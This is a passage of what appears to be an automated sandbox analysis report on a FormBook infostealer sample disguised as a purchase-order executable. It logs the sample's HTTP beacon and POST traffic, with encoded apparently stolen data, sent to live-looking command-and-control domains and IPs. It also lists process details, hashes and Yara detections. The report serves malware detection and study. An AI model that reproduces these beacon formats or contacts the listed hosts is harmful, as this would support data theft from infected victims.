6a [TRUNCATED] Data Ascii: pnGX8L3p=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIMqZ02VtWKEmJif/la0RUoqs9YuPKa045oXDvJr9ToKh2uH+uHZ5Z0sc0tJoE0TRN0WvpehAjnlq7FsOYFqbT6G9epTCA2D0+HOR0/a5sb3eTX9FXmS0FA7cRvGiCrniyayxjYTwuBdmiBVbltmzkoYv/ktj4+TBjekFpdHNzeNHxy9Pcw24vdDItt+e8WTbZ9URuazYWsp568/f0yKCjRfcltj/CA1fR61rMc9wdk4KaradY6Pdc7076uQy+eLO0Q7KYt/TQgmZS3EbjuUCmO3rbsQ1pg9d4mkADNwjYqc53IOT7JXCtaQXK99mv+mn+8LZPNINpu+Qxsl1QHCywTU7xudlwhT8JJRRErNA2xxuNbLuFFABdhBU1HJ7stU7WFTyLLMWe48zP3XOe1lGfqBSFn9lU+mJOWFkDenbEMP2uzR6vx3qmt02agNXgQMf433nniF72arU/+HzfMx3jHkODTNmUud0+TuZwgo8waZmP+Lk5pBsgRWXcZ3Sbk0ZdOcgtB9mqWbW8TV3q2k+2jaWmoHGYnEgXqbQpn9V6ujEY+nrii6iZI3iPk9fxDRDpw02r9pwl7b0gP/uQMCVDbXc8focD0by28eXd4VXTGobiMOnUYVo4z2TFUUFP+aM/5oOhDjlxawgNSNEHkwsgBuyeOrKEXNOhnzk6R0jzAkXvJCu5eMpVQV3ari5ZVVbWHpxc+q1ZKrPTWm5T9YSJR1aNzgCyM/vpEdo39GOX49YKRPj1lUtwqc6YNKe3Bp+KVtkNYcP6JmvgTk0HTczTJZunfRUgRAQjzoxmITZTBJgAFKZjg0Bv8ZGbFgEA1eLCJA [TRUNCATED]
Jan 15, 2025 08:31:17.091588974 CET	367	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:16 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49924	195.110.124.133	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:18.985902071 CET	539	OUT	GET /fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:31:19.662909985 CET	367	IN	HTTP/1.1 404 Not Found Date: Wed, 15 Jan 2025 07:31:19 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49925	217.196.55.202	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:41.058429003 CET	796	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 213 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 38 31 6e 69 65 69 33 71 4c 44 64 43 47 51 39 4a 6a 50 7a 58 78 74 43 69 79 75 77 63 71 4c 41 38 34 43 6e 30 58 4c 33 30 77 61 6f Data Ascii: pnGX8L3p=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju81niei3qLDdCGQ9JjPzXxtCiyuwcqLA84Cn0XL30wao
Jan 15, 2025 08:31:41.615114927 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 15 Jan 2025 07:31:41 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49926	217.196.55.202	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:43.602781057 CET	820	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 237 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d Data Ascii: pnGX8L3p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
Jan 15, 2025 08:31:44.177155972 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 15 Jan 2025 07:31:44 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49928	217.196.55.202	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:46.142512083 CET	1833	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1249 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 70 6e 47 58 38 4c 33 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 [TRUNCATED] Data Ascii: pnGX8L3p=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZfkPFshJwHWaHNny3DkcPzc/IfGnB72zQjWKa0reTy4wEsckqATH7uKlBlt+5T8FeGnIDHhGjLhQCvRwhHeMtIQLo1ulFdPm/WZjwfg3pXLqJzL6uZk/hShK87J/B8NmdNvErSQkufL8hBA6zjEhyI6vGuUgH2s81XeVIDixDbnWIPixe5THOj1QX8Q7yqPkkxjHAxt+ggpiweeAg1wP76LC37rf6GaI5SASvonDhKMK42ZwjLnYCbzLpsDW6+lxtNU6KY0OpSMOyB9tpQUYABR2tO6zcGqRGhFeO8cDb871WKvJV2kIu8VmqYNpIfCSiLUB5tW18VukjKiTAT7SvDARlAZmM0B+L75MyEmXDWkRWxGyClElMITMefbC5NclUvpHwjCf5SM9zzt5tJPtM0o1agCyknjpzI9xq3HAAA9jzk4FKj9oqhUy45KY9s0VPu1RhxhCqTNJI/dYagWk4FoKQ6BMS1OfaNmEP6uVrKjJxiAFwbDOxuZpDRHEcxj4G0SAJ1uVgAfCJvJHZYLtd1wAQFg38hf2B+nsFLyyyOVDGnIfV3zC2fBe2ciH0I0iu4z1N5LddlXlYO6opVxpgLUoopx/pcLClB0CCHpLHlubs768Rp8skFn3/HEWJWZos8nnOPkJnv/DI8jCepFOpl5f5jTCTMFNnHQpyZSCLexonbe5T720PRkZoL1kkMlqK9qSkj3hhJj8P5IdVmldOFK+glMDimMQZOUx5VUGBjfJmbPiUI4HXHsFqq6rYOi2fmLAv6Ut1BwpcdBlY6iYLPL6ryNaK2eSEtNnpR7x0AcHqDGyh0viGZGuVzAxcwL2Y0 [TRUNCATED]
Jan 15, 2025 08:31:46.699182034 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 15 Jan 2025 07:31:46 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49929	217.196.55.202	80	3328	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 08:31:48.692162991 CET	535	OUT	GET /fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 15, 2025 08:31:49.267287970 CET	1236	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 15 Jan 2025 07:31:49 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div
Jan 15, 2025 08:31:49.267415047 CET	16	IN	Data Raw: 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: ></body></html>

Target ID:	0
Start time:	02:27:59
Start date:	15/01/2025
Path:	C:\Users\user\Desktop\PO-DOC1522025-12.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-DOC1522025-12.exe"
Imagebase:	0x140000
File size:	1'645'568 bytes
MD5 hash:	DC2314BB7A5383EB616A78E1F43D4472
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:28:00
Start date:	15/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-DOC1522025-12.exe"
Imagebase:	0x550000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:28:08
Start date:	15/01/2025
Path:	C:\Program Files (x86)\bXIpphUjFWelaaPmHZnFcwrbgUUHhtMbpaGJIFwkCpGTIJTEhvFfLzbDlgZUteMFbufwjHfdhu\wRnnQBtyTqqaEOnAYYgvzRWAV.exe
Wow64 process (32bit):	true
